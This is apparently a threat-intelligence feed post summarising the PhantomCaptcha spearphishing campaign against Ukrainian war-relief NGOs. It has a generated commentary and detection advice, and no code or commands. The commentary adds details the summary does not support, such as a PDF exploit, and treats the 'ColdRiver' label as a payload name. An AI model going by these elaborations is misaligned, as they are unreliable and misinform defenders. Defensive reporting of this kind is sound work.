PhantomCaptcha: Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation

SUMMARY :

A coordinated spearphishing campaign targeted NGOs and Ukrainian government administrations involved in war relief efforts. The attack used emails impersonating the Ukrainian President's Office with weaponized PDFs, employing a fake Cloudflare captcha page to execute malware. The final payload was a WebSocket RAT enabling remote command execution and data exfiltration. Despite six months of preparation, the attackers' infrastructure was only active for one day, indicating sophisticated planning and operational security. An additional mobile attack vector was discovered, using fake applications to collect data from Android devices. The campaign demonstrated extensive operational planning, compartmentalized infrastructure, and deliberate exposure control.

OPENCTI LABELS :

powershell,ukraine,android,spearphishing,captcha,ngos,coldriver,websocket rat


AI COMMENTARY :

1. Introduction to PhantomCaptcha Spearphishing Campaign In early operations against Ukraine, a sophisticated threat actor launched PhantomCaptcha, a single-day spearphishing operation that specifically targeted non-governmental organizations and government administrations engaged in war relief efforts. The campaign’s title reflects its use of a counterfeit Cloudflare captcha mechanism, which was central to the infection chain. Researchers identified this activity after observing tailored emails impersonating the Ukrainian President’s Office, an approach that leveraged trust and urgency to entice recipients into interacting with weaponized content.

2. Deceptive Emails and Weaponized PDFs The spearphishing emails arrived with compelling subject lines that appeared legitimate and urgent to NGO employees and officials. Embedded within these messages was a malicious PDF attachment that exploited common document vulnerabilities. Upon opening the file, victims were prompted to complete what looked like a routine captcha verification, yet this step actually triggered a hidden PowerShell downloader. By leveraging a multi-layered PDF exploit and decoy content, the attackers ensured the initial stages of the campaign remained covert until the payload deployment began.

3. Fake Cloudflare Captcha and Multi-Stage Payload Deployment After initiating the PDF, victims were redirected to a faux Cloudflare captcha page, which in reality hosted additional malicious scripts. The use of a Cloudflare-themed verification page allowed the adversaries to masquerade their infrastructure as a trusted content delivery network. Once the fake captcha step was completed, a series of PowerShell commands executed to fetch a second-stage component referred to in threat intelligence as ColdRiver. This modular approach facilitated ongoing communication with a command and control server accessible over WebSocket, enabling the dynamic retrieval of further instructions and secondary payloads in real time.

4. WebSocket RAT Capabilities and Data Exfiltration The final payload was a custom WebSocket RAT designed to establish a two-way communication channel with the attackers. This remote access Trojan allowed threat actors to execute commands, capture screenshots, harvest credentials, and exfiltrate sensitive data. WebSocket technology provided stealthy and persistent connectivity that blended into legitimate traffic. By leveraging this protocol, the adversaries were able to maintain control over compromised hosts while evading detection by conventional network monitoring tools.

5. Android-Based Mobile Attack Vector In parallel with the desktop-focused operations, researchers uncovered an Android mobile component. Fake applications mimicking well-known utilities were distributed through phishing lures. When installed, these malicious apps collected device metadata, contact lists, call logs, and location data before transmitting the aggregated information back to the same WebSocket infrastructure. This dual-platform strategy broadened the attackers’ intelligence-gathering capabilities and underscored their attention to comprehensive reconnaissance against key personnel involved in the war relief efforts.

6. Operational Sophistication and Infrastructure Management Analysis of the infrastructure revealed six months of careful preparation, including the registration of domain names, configuration of hosting environments, and development of custom payloads. Remarkably, the entire C2 framework was only active for a single day to minimize the attack surface and reduce the likelihood of takedown or exposure. By compartmentalizing each stage across different servers and employing strict exposure control measures, the adversaries demonstrated advanced operational security and planning that can serve as a template for future threat actors.

7. Recommendations for Detection and Mitigation Organizations should enhance email filtering to identify and quarantine messages impersonating trusted institutions, particularly for users handling sensitive war relief and NGO communications. Deploying behavioral analysis tools that monitor anomalous PowerShell executions and WebSocket connections can help detect multi-stage payloads like ColdRiver. Mobile device management solutions should enforce application whitelisting to prevent unauthorized Android installations. Regular user awareness training is crucial to teach staff how to recognize deceptively branded captchas and PDF exploits. Finally, establishing an incident response playbook tailored to spearphishing and WebSocket-based RAT scenarios will bolster organizational resilience against similar future campaigns.


OPEN NETMANAGEIT OPENCTI REPORT LINK!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


PhantomCaptcha: Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation